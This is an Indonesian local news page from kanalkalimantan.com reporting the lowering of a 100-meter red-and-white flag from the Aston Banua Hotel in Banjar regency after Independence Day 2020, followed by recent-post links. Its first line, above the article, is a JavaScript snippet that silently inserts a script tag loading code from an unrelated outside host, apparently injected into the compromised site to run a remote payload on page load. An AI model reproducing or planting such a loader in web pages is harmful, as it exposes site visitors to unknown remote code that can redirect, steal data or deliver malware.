(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: Kabupaten Banjar

Merah Putih di Gedung Tertinggi di Kalsel Diturunkan


KANALKALIMANTAN.COM. MARTAPURA – Setelah terpasang selama 12 hari, bendera merah putih tertinggi pertama di Kalsel pada bangunan gedung akhirnya diturunkan.

Penurunan bendera dilakukan anggota TNI Rindam VI/Mulawarman, bendera dengan panjang 100 meter dan lebar 6.5 meter dari Aston Banua Hotel di Kecamatan Gambut Kabupaten Banjar, Sabtu (29/8/2020) sore.

Penurunan bendera merah putih tersebut dihadiri Sekda Banjar HM Hilman, Ketua DPRD Banjar HM Rofiqi, Dandim 1006 Martapura Letkol Arm Siswo Budiarto, Kapolres Banjar AKBP Andri Koko Prabowo, General Manager Hotel Aston Banua Andre Kurniawan beserta undangan.

Dandim 1006/Martapura Letkol Arm Siswo Budiarto mengaku lega dan bangga bisa melaksanakan kegiatan pengibaran dan penurunan kembali bendera merah putih diAston Hotel Banua dengan lancar.

“Makna dari pengibaran bedera merah putih ini sebagai wujud bagaimana perjuangan kita dalam memberikan semangat dan motivasi kepada masyarakat, di masa pandemi ini,” ujarnya.

Sementara itu, Sekda Banjar HM Hilman turut mengapresiasi dan bangga atas apa yang sudah dilakukan Aston Banua dalam memeriahkan HUT ke-75 Kemerdekaan RI.

Dia mengajak semua pihak untuk bersama-sama menjaga persatuan dan kebersamaan.

“Mari kita pererat rasa persatuan kita dengan mencontoh semangat juang para pahlawan kemerdekaan, dengan tegar dan sabar dalam menghadapi ujian Covid-19 ini dengan harapan semoga pandemi ini segera berakhir,” harapnya.

Sedangkan Manager Hotel Aston Banua Andre Kurniawan mengaku bangga bisa berpartisipasi dalam pelaksanaan pengibaran bendera merah putih di gedung hotel yang dikelolanya.

Di akhir acara dilakukan acara ramah tamah bersama forkopimda Banjar dan dilanjutkan talk show dengan pembahasan “semangat kemerdekaan di masa pandemi Covid 19”. (mkkominfobanjar/kanalkalimantan.com)

 


Al Ghifari

Recent Posts

Chaos Banjarmasin di Atas Kanvas, Tragedi Kelam Jumat Kelabu 23 Mei 1997

“Setiap goresan kuas di lukisan ini, saya terbayang, merasakan terbawa kedalam suasana, di saat kerusuhan… Read More

52 menit ago

Perpisahan Siswa SMAN 1 Kapuas, Erlin Hardi : Belajar, Belajar, dan Belajar!

KANALKALIMANTAN.COM, KUALA KAPUAS - Pendidikan merupakan tolak ukur kemajuan suatu bangsa. Dengan pendidikan yang baik… Read More

2 jam ago

Nilai Posisi Waspada, Pemkab Kapuas Gelar Rakor SPI MCP dan LHKPN

KANALKALIMANTAN.COM, KUALA KAPUAS - Pemerintah Kabupaten (Pemkab) Kapuas melalui Inspektorat melaksanakan rapat koordinasi (Rakor) terkait… Read More

3 jam ago

LITERASI EMOSIONAL DI MEDIA SOSIAL: MENGELOLA EMOSI DAN INTERAKASI ONLINE

"WEBINAR INDONESIA MAKIN CAKAP DIGITAL" WILAYAH KALIMANTAN Read More

4 jam ago

Wabup Banjar Hadiri Haul Ke-68 KH Zainal Ilmi

KANALKALIMANTAN.COM, MARTAPURA - Wakil Bupati Banjar Habib Idrus Al Habsyi betbaur dengan ribuan orang menghadiri… Read More

5 jam ago

Simulasi Keadaan Darurat di Terminal BBM Banjarmasin

KANALKALIMANTAN.COM, BANJARMASIN - PT Pertamina Patra Niaga Integrated Terminal Banjarmasin melakukan simulasi keadaan darurat bersama… Read More

15 jam ago

This website uses cookies.